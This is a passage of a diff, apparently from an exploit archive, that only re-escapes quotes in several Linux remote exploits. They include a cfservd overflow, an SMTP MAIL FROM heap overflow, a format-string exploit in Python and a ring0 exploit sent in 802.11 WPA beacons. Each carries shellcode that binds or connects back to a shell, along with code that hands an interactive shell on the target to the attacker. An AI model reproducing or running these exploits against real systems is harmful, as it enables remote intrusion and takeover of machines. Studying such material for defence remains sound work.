+	fprintf(stdout,\"-> Nope.. I ain\'t waiting any longer.. =p\\n\");
 	exit(0);
 }
 int main(int argc, char *argv[]) {
 	char opt;
-	char *buf, *ptr, *ip="";
+	char *buf, *ptr, *ip=\"\";
 	struct sockaddr_in sockadd;
 	int i, s1, s2, i_len, ok=0, mode=0;
 	int time_out=TIME_OUT, scsize=SC_SIZE_1;
@ -296,48 +296,48 @@ int main(int argc, char *argv[]) {
 	if (argc<2) { usage(argv[0]); }
-	while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) {
+	while ((opt=getopt(argc,argv,\"i:r:b:a:h:t:s:o:T:l\"))!=EOF) {
 		switch(opt) {
-			case 'i':
+			case \'i\':
 			ip=optarg;
 			changeip(ip);
 			break;
-			case 'l':
+			case \'l\':
 			mode=1;
 			scsize=SC_SIZE_2;
 			break;
-			case 'T':
+			case \'T\':
 			time_out=atoi(optarg);
 			break;
-			case 'b':
+			case \'b\':
 			buffsize=atoi(optarg);
 			break;
-			case 'a':
+			case \'a\':
 			align=atoi(optarg);
 			break;
-			case 'h':
+			case \'h\':
 			ok=1;
 			sockadd.sin_addr.s_addr = inet_addr(optarg);
 			break;
-			case 'r':
+			case \'r\':
 			retsize=atoi(optarg);
 			break;
-			case 't':
+			case \'t\':
 			t_port=atoi(optarg);
 			break;
-			case 's':
+			case \'s\':
 			s_port=atoi(optarg);
 			break;
-			case 'o':
+			case \'o\':
 			offset=atoi(optarg);
 			break;
@ -347,16 +347,16 @@ int main(int argc, char *argv[]) {
 		}
 	}
-	if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }
+	if (!ok || (mode&&((strcmp(ip,\"\")==0)) ) ) { usage(argv[0]); }
 	if (!(buf=malloc(buffsize+1))) {
-		err_exit("-> malloc() error");
+		err_exit(\"-> malloc() error\");
 	}
 	ret_addr=RET_ADDR-offset;
-	fprintf(stdout,"\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\n");
+	fprintf(stdout,\"\\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\\n\");
-	fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n");
+	fprintf(stdout,\"Tested to work against cfservd 2.0.7 on Redhat 8.0\\n\\n\");
-	fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr);
+	fprintf(stdout,\"-> Using return address of 0x%08x\\n\", ret_addr);
 	ptr=buf;
 	for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }
@ -379,23 +379,23 @@ int main(int argc, char *argv[]) {
 	sockadd.sin_port = htons(t_port);
 	if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
-		err_exit("-> socket error");
+		err_exit(\"-> socket error\");
 	}
 	if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
-		err_exit("-> connect() error");
+		err_exit(\"-> connect() error\");
 	}
 	if (mode) {
-		fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port);
+		fprintf(stdout,\"-> \'Listening\' mode...( port: %d )\\n\",s_port);
 		if (fork()==0) {
 			sleep(2);
 			if (send(s1,buf,buffsize,0)<0) {
-				err_exit("-> send() error");
+				err_exit(\"-> send() error\");
 			}
-			fprintf(stdout,"-> Exploit string sent....\n");
+			fprintf(stdout,\"-> Exploit string sent....\\n\");
 			exit(0);
 		}
@ -405,7 +405,7 @@ int main(int argc, char *argv[]) {
 			alarm(time_out);
 			if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) {
-        			err_exit("-> socket error");
+        			err_exit(\"-> socket error\");
 			}
 			memset(&sockadd,0,sizeof(sockadd));
@ -415,26 +415,26 @@ int main(int argc, char *argv[]) {
 			i_len=sizeof(sockadd);
 			if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) {
-				err_exit("-> bind() error");
+				err_exit(\"-> bind() error\");
 			}
 			if (listen(s2,0)<0) {
-				err_exit("-> listen() error");
+				err_exit(\"-> listen() error\");
 			}
 			wait();
 			close(s1);
-			fprintf(stdout,"-> Waiting for connection....\n");
+			fprintf(stdout,\"-> Waiting for connection....\\n\");
 			s1=accept(s2,(struct sockaddr *)&sockadd,&i_len);
 			if (s1<0) {
-				err_exit("-> accept() error");
+				err_exit(\"-> accept() error\");
 			}
 			alarm(0);
-			fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr));
+			fprintf(stdout,\"-> Connection from: %s\\n\",inet_ntoa(sockadd.sin_addr));
 			sendcmd(s1);
 			doshell(s1);
@ -446,28 +446,28 @@ int main(int argc, char *argv[]) {
 	else {
 		if (send(s1,buf,buffsize,0)<0) {
-			err_exit("-> send() error");
+			err_exit(\"-> send() error\");
 		}
 		close(s1);
-		fprintf(stdout,"-> 'Connecting' mode...\n");
+		fprintf(stdout,\"-> \'Connecting\' mode...\\n\");
-		fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n");
+		fprintf(stdout,\"-> Exploit string sent. Waiting for a shell...\\n\");
 		sleep(2);
 		sockadd.sin_family = AF_INET;
 		sockadd.sin_port = htons(s_port);
 		if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
-			err_exit("-> socket() error");
+			err_exit(\"-> socket() error\");
 		}
 		if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
-        		fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n");
+        		fprintf(stdout,\"-> Exploit failed. Target probably segfaulted...\\n\\n\");
 			exit(0);
 		}
-		fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port);
+		fprintf(stdout,\"-> Connecting to shell at %s:%d\\n\",inet_ntoa(sockadd.sin_addr),s_port);
 		sendcmd(s1);
 		doshell(s1);
--- a/platforms/linux/remote/25275.c
+++ b/platforms/linux/remote/25275.c
@ -26,29 +26,29 @@ This BID will be updated when more information becomes available.
 *
 * Notes:
 *
- * You can't have any characters in overflow buffer that isspace() returns true
+ * You can\'t have any characters in overflow buffer that isspace() returns true
 * for.  The shellcode is clear of them, but if your return address or retloc
 * has one you gotta figure out another one.  My slack box has that situation,
 * heap is at 0x080d.. My gentoo laptop had no such problem and all was fine.  I
- * don't have anymore time to BS around with this and make perfect for any and
+ * don\'t have anymore time to BS around with this and make perfect for any and
- * all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
+ * all, b/c I\'ve got exam to study for and Law and Order:CI is on in an hour.
- * If the heap you're targetting is the same way, then try filling it up using
+ * If the heap you\'re targetting is the same way, then try filling it up using
- * some other commands.  If the GOT you're targetting is at such address than
+ * some other commands.  If the GOT you\'re targetting is at such address than
- * overwrite a return address on the stack.  Surely there's a way, check out the
+ * overwrite a return address on the stack.  Surely there\'s a way, check out the
- * source and be creative; I'm sure there are some memory leaks somewhere you
+ * source and be creative; I\'m sure there are some memory leaks somewhere you
 * can use to fill up heap as well.
 *
 * You might run into some ugliness trying to automate this for a couple
 * reasons.  xmalloc() stores a cookie in front of buffer, and xfree() checks
- * for this cookie before calling free().  So you're going to need that aligned
+ * for this cookie before calling free().  So you\'re going to need that aligned
 * properly unless you can cook up a way to exploit it when it bails out in
 * xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
 * maybe you can be clever and do something there). Furthermore I found that
 * when trying to trigger this multiple times the alignment was different each
- * time.  There are "definitely" more reliable ways to exploit this if you take
+ * time.  There are \"definitely\" more reliable ways to exploit this if you take
- * a deeper look into code which I don't have time to do right now.  The padding
+ * a deeper look into code which I don\'t have time to do right now.  The padding
 * parameter controls the alignment and the size of the chunk being allocated.
- * You'll probably have to play with it.  Yes that's fugly.
+ * You\'ll probably have to play with it.  Yes that\'s fugly.
 *
 * [n00b@crapbox.outernet] ./a.out
 * Usage: ./a.out < host > < padding > < retloc > < retaddr >
@ -67,11 +67,11 @@ This BID will be updated when more information becomes available.
 *
 * --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
 *
- * --{ Attempting to redefine the meaning of 'definitely'
+ * --{ Attempting to redefine the meaning of \'definitely\'
 *
 * --{ Got a shell
 *
- * --{ Updating Webster's
+ * --{ Updating Webster\'s
 * --{ definitely, adv.:
 * --{ 1. See specious
 *
@ -110,7 +110,7 @@ This BID will be updated when more information becomes available.
 #define Z(x, len) memset((x), 0, (len))
 #define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
-#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args);
+#define bye(fmt, args...) do{ fprintf(stderr, fmt\"\\n\", ##args);
 #exit(EXIT_FAILURE); }while(0)
@ -119,15 +119,15 @@ This BID will be updated when more information becomes available.
 #define SHELL_PORT 6969
 #define NOP 0x90
 char sc[] =
-"\xeb\x0e""notexploitable"
+\"\\xeb\\x0e\"\"notexploitable\"
-"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02"
+\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x39\\xc6\\x04\\x24\\x02\\x89\\xe6\\xb0\\x02\"
-"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02"
+\"\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\\x6a\\x01\\x6a\\x02\"
-"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0"
+\"\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\\x10\\x56\\x50\\x89\\xe1\\xb0\"
-"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd"
+\"\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\"
-"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89"
+\"\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\"
-"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f"
+\"\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\"
-"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd"
+\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x6b\\x2c\\x60\\xcd\"
-"\x80";
+\"\\x80\";
 /*  a dlmalloc chunk descriptor */
@ -148,7 +148,7 @@ ssize_t Send(int s, const void *buf, size_t len, int flags)
    n = send(s, buf, len, flags);
    if(n < 0)
-        die("send");
+        die(\"send\");
    return n;
 }
@ -160,7 +160,7 @@ ssize_t Recv(int s, void *buf, size_t len, int flags)
    n = recv(s, buf, len, flags);
    if(n < 0)
-        die("recv");
+        die(\"recv\");
    return n;
 }
@ -176,7 +176,7 @@ int conn(char *host, u_short port)
    hp = gethostbyname(host);
    if (hp == NULL) {
-            bye("gethostbyname failed with error %s", hstrerror(h_errno));
+            bye(\"gethostbyname failed with error %s\", hstrerror(h_errno));
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
@ -184,10 +184,10 @@ int conn(char *host, u_short port)
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
-            die("socket");
+            die(\"socket\");
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
-            die("connect");
+            die(\"connect\");
    return sock;
 }
@ -201,15 +201,15 @@ void shell(char *host, u_short port)
    sock = conn(host, port);
-    printf("--{ Got a shell\n\n"
+    printf(\"--{ Got a shell\\n\\n\"
-           "--{ Updating Webster's\n"
+           \"--{ Updating Webster\'s\\n\"
-           "--{ definitely, adv.:\n"
+           \"--{ definitely, adv.:\\n\"
-           "--{ 1. See specious\n\n"
+           \"--{ 1. See specious\\n\\n\"
-           "--{ For the linguistically challenged...\n"
+           \"--{ For the linguistically challenged...\\n\"
-           "--{ specious, adj. :\n"
+           \"--{ specious, adj. :\\n\"
-           "--{ 1. Having the ring of truth or plausibility but "
+           \"--{ 1. Having the ring of truth or plausibility but \"
-           "actually fallacious\n"
+           \"actually fallacious\\n\"
-           "--{ 2. Deceptively attractive\n\n"
+           \"--{ 2. Deceptively attractive\\n\\n\"
          );
    FD_ZERO(&rfds);
@ -219,29 +219,29 @@ void shell(char *host, u_short port)
            FD_SET(sock, &rfds);
            if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
-                die("select");
+                die(\"select\");
            if (FD_ISSET(STDIN_FILENO, &rfds)) {
            l = read(0, buf, BS);
            if(l < 0)
-                die("read");
+                die(\"read\");
            else if(l == 0)
-                        bye("\n - Connection closed by user\n");
+                        bye(\"\\n - Connection closed by user\\n\");
                if (write(sock, buf, l) < 1)
-                        die("write");
+                        die(\"write\");
            }
            if (FD_ISSET(sock, &rfds)) {
                l = read(sock, buf, sizeof(buf));
                if (l == 0)
-                        bye("\n - Connection terminated.\n");
+                        bye(\"\\n - Connection terminated.\\n\");
                else if (l < 0)
-                        die("\n - Read failure\n");
+                        die(\"\\n - Read failure\\n\");
                if (write(STDOUT_FILENO, buf, l) < 1)
-                        die("write");
+                        die(\"write\");
            }
    }
 }
@ -255,13 +255,13 @@ int parse_args(int argc, char **argv, char **host, int *npad,
    *host = argv[1];
-    if(sscanf(argv[2], "%d", npad) != 1)
+    if(sscanf(argv[2], \"%d\", npad) != 1)
        return 1;
-    if(sscanf(argv[3], "%x", retloc) != 1)
+    if(sscanf(argv[3], \"%x\", retloc) != 1)
        return 1;
-    if(sscanf(argv[4], "%x", retaddr) != 1)
+    if(sscanf(argv[4], \"%x\", retaddr) != 1)
        return 1;
    return 0;
@ -279,35 +279,35 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
    /* read greeting */
    n = Recv(sock, buf, BS, 0);
    if(n == 0)
-        bye("Server didn't even say hi");
+        bye(\"Server didn\'t even say hi\");
    /* send HELO */
-    n = snprintf(buf, BS, "HELO localhost\r\n");
+    n = snprintf(buf, BS, \"HELO localhost\\r\\n\");
    Send(sock, buf, n, 0);
    Z(buf, BS);
    n = Recv(sock, buf, BS, 0);
    if(n == 0)
-        bye("Server didn't respond to HELO");
+        bye(\"Server didn\'t respond to HELO\");
-    printf("--{ Said HELO\n\n");
+    printf(\"--{ Said HELO\\n\\n\");
    /*
     * Build evil chunk overflow.  The need to align chunk exactly makes this
-     * not so robust.  In my short testing I wasn't able to get free() called
+     * not so robust.  In my short testing I wasn\'t able to get free() called
-     * directly on an area of memory we control.  I'm sure you can though if you
+     * directly on an area of memory we control.  I\'m sure you can though if you
-     * take some time to study process heap behavior.  Note though that you'll
+     * take some time to study process heap behavior.  Note though that you\'ll
     * have to fill in the magic cookie field that xmalloc()/xfree() and some
-     * other functions use, so you'll still need to have it aligned properly
+     * other functions use, so you\'ll still need to have it aligned properly
     * which defeats the whole purpose.  This exploits the free() call on the
     * buffer we overflow, so you have to align the next chunk accordingly.
     * Anyhow on newest glibc there is a check for negative size field on the
     * chunk being freed, and program dies if it is negative (the exact
     * condition is not negative, but it has that effect pretty much, but go
-     * look yourself ;)), So the techniques outlined by gera in phrack don't
+     * look yourself ;)), So the techniques outlined by gera in phrack don\'t
     * work (being able to point all chunks at our two evil chunks).  Check out
-     * most recent glibc code in _int_free() if you haven't already.
+     * most recent glibc code in _int_free() if you haven\'t already.
     */
-    memset(pad, 'A', npad);
+    memset(pad, \'A\', npad);
    chunk.dummy = CHUNKSZ;
    chunk.prevsz = CHUNKSZ;
@ -318,20 +318,20 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
    evil[CHUNKLEN] = 0;
    /* send the overflow */
-    n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
+    n = snprintf(buf, BS, \"MAIL FROM:<A!@A:%s> %s%s\\n\", pad, evil, sc);
    Send(sock, buf, n, 0);
    Z(buf, BS);
-    printf("--{ Sent MAIL FROM overflow\n\n");
+    printf(\"--{ Sent MAIL FROM overflow\\n\\n\");
 #define SLEEP_TIME 15
    setbuf(stdout, NULL);
-    printf("--{ Going for shell in ");
+    printf(\"--{ Going for shell in \");
    for(n = 0; n < SLEEP_TIME; n++){
-        printf("%d ", SLEEP_TIME-n);
+        printf(\"%d \", SLEEP_TIME-n);
        sleep(1);
    }
-    puts("\n");
+    puts(\"\\n\");
 }
@ -344,21 +344,21 @@ int main(int argc, char **argv)
    char    *host = NULL;
    if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
-        bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
+        bye(\"Usage: %s < host > < padding > < retloc > < retaddr >\\n\", argv[0]);
-    printf("--{ Smack 1.oohaah\n\n");
+    printf(\"--{ Smack 1.oohaah\\n\\n\");
    sock = conn(host, SMTP_PORT);
-    printf("--{ definitely, adv.:\n"
+    printf(\"--{ definitely, adv.:\\n\"
-           "--{ 1. Having distinct limits\n"
+           \"--{ 1. Having distinct limits\\n\"
-           "--{ 2. Indisputable; certain\n"
+           \"--{ 2. Indisputable; certain\\n\"
-           "--{ 3. Clearly defined; explicitly precise\n\n"
+           \"--{ 3. Clearly defined; explicitly precise\\n\\n\"
          );
    sploit(sock, npad, retloc, retaddr);
-    printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
+    printf(\"--{ Attempting to redefine the meaning of \'definitely\'\\n\\n\");
    shell(host, SHELL_PORT);
--- a/platforms/linux/remote/307.py
+++ b/platforms/linux/remote/307.py
@ -17,18 +17,18 @@ pad = 2
 #0000000F  FFE1              jmp ecx
 # read(4, esp, -1); jmp ecx
-lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
+lnx_readsc = \"\\x31\\xdb\\xf7\\xe3\\xb0\\x03\\x80\\xc3\\x04\\x89\\xe1\\x4a\\xcd\\x80\\xff\\xe1\"
-lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
+lnx_stage_one = \"\\x90\" * (23 - len(lnx_readsc)) + lnx_readsc
 # dup2 shellcode(4->0,1,2)
-lnx_stage_two  = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" 
+lnx_stage_two  = \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\xb2\\x3f\\x88\\xd0\\xb3\\x04\" 
-lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
+lnx_stage_two += \"\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\"
 # execute /bin/sh 
-lnx_stage_two += "\x90" * 100
+lnx_stage_two += \"\\x90\" * 100
-lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
+lnx_stage_two += \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"
-lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
+lnx_stage_two += \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\"
-lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"
+lnx_stage_two += \"\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"
-targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] 
+targets = [ [ 0 ], [ \"Compiled test platform\", 0x0804c418, 0xbffff9e8 ] ] 
 bruteforce = 0
@ -37,13 +37,13 @@ self.host = host
 self.port = port
 set = 0
-if(os == "linux"):
+if(os == \"linux\"):
 set = 1
 self.stage_one = self.lnx_stage_one
 self.stage_two = self.lnx_stage_two
 if(set == 0):
-print "Unknown OS"
+print \"Unknown OS\"
 os._exit()
 self.os = os
@ -74,48 +74,48 @@ self.fd.connect((self.host, self.port))
 def exploit(self, where, what):
 if(not self.fd or self.fd is None): self.connect()
-self.already_written = len('gethostbyname(')
+self.already_written = len(\'gethostbyname(\')
-#print "# of nops: %d\n" % (23 - len(self.readsc))
+#print \"# of nops: %d\\n\" % (23 - len(self.readsc))
-exploit = "x" * self.pad
+exploit = \"x\" * self.pad
 self.already_written += self.pad
-exploit += struct.pack("<l", where)
+exploit += struct.pack(\"<l\", where)
-exploit += struct.pack("<l", where + 2)
+exploit += struct.pack(\"<l\", where + 2)
 self.already_written += 8 
 l = self.wl16(what & 0xffff)
-fill = "%1$" + str(l) + "u"
+fill = \"%1$\" + str(l) + \"u\"
 exploit += fill
-exploit += "%7$hn"
+exploit += \"%7$hn\"
 l = self.wl16(what >> 16)
-fill = "%1$" + str(l) + "u"
+fill = \"%1$\" + str(l) + \"u\"
 exploit += fill
-exploit += "%8$hn"
+exploit += \"%8$hn\"
-#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
+#print \"[*] Format string: (%s) Len: %d\" % (exploit, len(exploit))
-#print "[*] Stage 1 length: %d" % len(self.stage_one)
+#print \"[*] Stage 1 length: %d\" % len(self.stage_one)
 #time.sleep(5)
 try:
-self.fd.send(exploit + self.stage_one + "\n")
+self.fd.send(exploit + self.stage_one + \"\\n\")
 self.fd.send(self.stage_two)
 time.sleep(1)
-self.fd.send("echo spawned; uname -a; id -a;\n")
+self.fd.send(\"echo spawned; uname -a; id -a;\\n\")
-print "Recieved: " + self.fd.recv(1024)
+print \"Recieved: \" + self.fd.recv(1024)
 except:
 self.fd.close()
 self.fd = None 
-print "\tFailed @ 0x%08x" % what
+print \"\\tFailed @ 0x%08x\" % what
 return 0
 remote = telnetlib.Telnet()
 remote.sock = self.fd
-print "[*] You should now have a shell"
+print \"[*] You should now have a shell\"
 remote.interact()
 os.exit(0)
@ -125,23 +125,23 @@ r.exploit(where, i)
 def run(self):
 if(self.bruteforce):
-print "Bruteforcing.."
+print \"Bruteforcing..\"
-#print "not implemented yet"
+#print \"not implemented yet\"
 #os._exit(1)
 for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
-print "Trying: 0x%08x" % i
+print \"Trying: 0x%08x\" % i
 self.force(i, 0xbffffa00, 0xbffff9c0)
 #self.exploit(self.args[1], self.args[2])
-if __name__ == '__main__':
+if __name__ == \'__main__\':
 if(len(sys.argv) != 4):
-print "%s host [linux] targetid"
+print \"%s host [linux] targetid\"
-print "- 0 to brute force"
+print \"- 0 to brute force\"
-print "- 1 custom compile"
+print \"- 1 custom compile\"
 os._exit(0)
-print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
+print \"%s-%s-%s\" % (sys.argv[1], sys.argv[2], sys.argv[3])
 r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
 #r.exploit(0x0804c418, 0xbffff9e8)
 #r.force(0x0804c418, 0xbffffa00, 0xbffff800)
--- a/platforms/linux/remote/3389.c
+++ b/platforms/linux/remote/3389.c
@ -9,7 +9,7 @@
 * ....
 * ....
 * the function re-uses args in the stack before returning so we 
- * can't trash them overwriting. 
+ * can\'t trash them overwriting. 
 * Different compiled module [ex. different version of gcc] may require 
 * a different pad value.. (see -g option)
 *
@ -130,69 +130,69 @@ unsigned int pad_space = PAD_SPACE;
 #define SUB_OFFSET_PATCH 8
 char ring0_code[]=
- "\xe8\x00\x00\x00\x00"      //call   8048359 <main+0x21>
+ \"\\xe8\\x00\\x00\\x00\\x00\"      //call   8048359 <main+0x21>
- "\x5e"                      //pop    %esi
+ \"\\x5e\"                      //pop    %esi
- "\x81\xee\x88\x00\x00\x00"  //sub    $0x88,%esi  /* PATCH */
+ \"\\x81\\xee\\x88\\x00\\x00\\x00\"  //sub    $0x88,%esi  /* PATCH */
- "\x31\xc0"                  //xor    %eax,%eax
+ \"\\x31\\xc0\"                  //xor    %eax,%eax
- "\xb0\x04"                  //mov    $0x4,%al
+ \"\\xb0\\x04\"                  //mov    $0x4,%al
- "\x01\xc4"                  //add    %eax,%esp
+ \"\\x01\\xc4\"                  //add    %eax,%esp
- "\x83\x3c\x24\x73"          //cmp    $0x73,%esp
+ \"\\x83\\x3c\\x24\\x73\"          //cmp    $0x73,%esp
- "\x75\xf8"                  //jne    8048364 <main+0x2c>
+ \"\\x75\\xf8\"                  //jne    8048364 <main+0x2c>
- "\x83\x7c\x24\x0c\x7b"      //cmpl   $0x7b,0xc(%esp)
+ \"\\x83\\x7c\\x24\\x0c\\x7b\"      //cmpl   $0x7b,0xc(%esp)
- "\x75\xf1"                  //jne    8048364 <main+0x2c>
+ \"\\x75\\xf1\"                  //jne    8048364 <main+0x2c>
- "\x29\xc4"                  //sub    %eax,%esp
+ \"\\x29\\xc4\"                  //sub    %eax,%esp
- "\x8b\x7c\x24\x0c"          //mov    0xc(%esp),%edi
+ \"\\x8b\\x7c\\x24\\x0c\"          //mov    0xc(%esp),%edi
- "\x89\x3c\x24"              //mov    %edi,(%esp)
+ \"\\x89\\x3c\\x24\"              //mov    %edi,(%esp)
- "\x31\xc9"                  //xor    %ecx,%ecx
+ \"\\x31\\xc9\"                  //xor    %ecx,%ecx
- "\xb1\x5b"                  //mov    $0x5b,%cl /* FIX */
+ \"\\xb1\\x5b\"                  //mov    $0x5b,%cl /* FIX */
- "\xf3\xa4"                  //rep movsb %ds:(%esi),%es:(%edi)
+ \"\\xf3\\xa4\"                  //rep movsb %ds:(%esi),%es:(%edi)
- "\xcf";                     //iret
+ \"\\xcf\";                     //iret
 /* connect back */
 #define IP_OFFSET   35
 #define PORT_OFFSET 44
 char u_code[] = 
-"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
+\"\\x31\\xc0\\x89\\xc3\\x40\\x40\\xcd\\x80\\x39\\xc3\\x74\\x03\\x31\\xc0\\x40\\xcd\\x80\" /* fork */
-"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"              
+\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x5b\\x5d\"              
-"\xbe"
+\"\\xbe\"
-"\xf5\xff\xff\xfe"  // ~ip
+\"\\xf5\\xff\\xff\\xfe\"  // ~ip
-"\xf7\xd6\x56\x66\xbd"
+\"\\xf7\\xd6\\x56\\x66\\xbd\"
-"\x69\x7a"          // port
+\"\\x69\\x7a\"          // port
-"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"   
+\"\\x0f\\xcd\\x09\\xdd\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\"   
-"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"  
+\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\"  
-"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";         
+\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\";         
 /* 802.11header + WPA IE prolog */
 #define WPA_LEN_OFFSET 55
 #define CHANNEL     11
 char beacon_80211_wpa[] = 
-"\x80"              // management frame / subtype beacon
+\"\\x80\"              // management frame / subtype beacon
-"\x00"              // flags
+\"\\x00\"              // flags
-"\x00\x00"          // duration
+\"\\x00\\x00\"          // duration
-"\xFF\xFF\xFF\xFF\xFF\xFF"  // destination addr
+\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\"  // destination addr
-"\xCC\xCC\xCC\xCC\xCC\xCC"  // src address
+\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\"  // src address
-"\xCC\xCC\xCC\xCC\xCC\xCC"  // bbsid
+\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\"  // bbsid
-"\x00\x00"          // seq
+\"\\x00\\x00\"          // seq
-"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
+\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // timestamp
-"\x64\x00"          // interval
+\"\\x64\\x00\"          // interval
-"\x01\x00"          // caps
+\"\\x01\\x00\"          // caps
-"\x00\x03\x41\x41\x41"  // ssid Information Element
+\"\\x00\\x03\\x41\\x41\\x41\"  // ssid Information Element
-"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
+\"\\x01\\x08\\x82\\x84\\x8b\\x96\\x0c\\x18\\x30\\x48\" // rates Information Element
-"\x03\x01\x0B"     // channel Information Element (11)
+\"\\x03\\x01\\x0B\"     // channel Information Element (11)
-"\xdd\xc6"         // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
+\"\\xdd\\xc6\"         // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
-"\x00\x50\xf2\x01\x01\x00";     // oui + type + version (first 6 byte of len)
+\"\\x00\\x50\\xf2\\x01\\x01\\x00\";     // oui + type + version (first 6 byte of len)
